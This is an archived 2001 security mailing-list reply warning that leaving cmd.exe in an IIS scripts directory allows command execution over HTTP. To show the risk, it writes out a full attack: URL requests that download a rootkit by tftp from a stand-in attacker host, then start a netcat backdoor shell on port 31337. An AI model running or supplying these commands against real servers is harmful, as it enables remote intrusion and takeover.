RE: cmd.exe / root.exe question

From: Chris Eidem (jceidem@dexma.com)
Date: 08/27/01 

Subject: RE: cmd.exe / root.exe question
Date: Mon, 27 Aug 2001 13:04:10 -0500
Message-ID: <B83445050D0D6B4BAD2801F1585F9D6E0F1B45@xmail1.Dexma.com>
From: "Chris Eidem" <jceidem@dexma.com>
To: <focus-ms@securityfocus.com>

> Where exactly is the risk a cmd.exe (under what name ever) is placed
in a
> scriptable directory? I've put cmd.exe into wwwroot under iis5 and
gave
> scripting to the file.
>

The exact risk the ability to execute commands from a http request. Big
risk. Bad idea. No, wait, BAD IDEA!

> Now tried to remotely execute it. I didn't succeed to get a
remoteshell. Via
> IE5 I could exceute the file but got a local shell, only. Netcat with
'nc
> <ip> 80 -v' and 'GET /cmd.exe HTTP/1.0\n' gave my soundchip a ride to
hell when
> interpreting all the beeps ;-)
>

You didn't do it right. The dance goes a little like this:

telnet www.dumbvictim.com 80

GET /scripts/cmd.exe+/c+tftp+-i+ftp.badguytools.net+get+rootkit.exe

(gets rootkit.exe which contains all manner of nefarious tools,
including netcat for NT.)

GET /scripts/cmd.exe+/c+nc+-d+-e+cmd.exe+-L+31337

(launch netcat in stealth mode (-d), listen and restart connections on
port 31337 (-L) and run cmd.exe when a connection is made on port 31337.

nc www.dumbvictim.com 31337

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\>

tada! r00ted, d00d!

> If cmd were boud to any port and listening I'd see security
implications.
> But with only a file lying around?

All you need is a file lying around.

Leaving cmd.exe around is a BAD IDEA(tm)

Chris

Relevant Pages

  • Re: [fw-wiz] Isolating internal servers behind firewalls
    ... Does every desktop require access to every server's file share port, ... If you have a/or several intranet IIS servers, ... If one thinks Windows file sharing is not risky, then I have no basis to argue the point any further. ... information at risk. ...
    (Firewall-Wizards)
  • RE: Unauthorised switchport access
    ... In a short answer, yes, you are at risk. ... address of the 'trusted' machine to the port. ... EARN A MASTER OF SCIENCE IN INFORMATION ASSURANCE - ONLINE ... The NSA has designated Norwich University a center of Academic ...
    (Security-Basics)
  • Re: Question about "Hurricane Season"
    ... >>> We are looking to book our first cruise and are probably looking around ... >>> September or so out of Galveston. ... My take is, its a risk. ... Port Canaveral or wherever. ...
    (rec.travel.cruises)
  • Re: Newbie ipchains help
    ... >>even if I only enable the port for a single IP address? ... >I think it's not a big risk but a middle risk. ... >Attacker sniff your SMB traffics at somewhere your using route. ... >And I'm not sure that contents of SMB traffics encrypted or not. ...
    (comp.os.linux.security)
  • remote control issues
    ... of remote control software. ... - i gather that i'll need to open a port on the router for the remote ... risk is relative to the application that exists on that port, ...
    (comp.security.firewalls)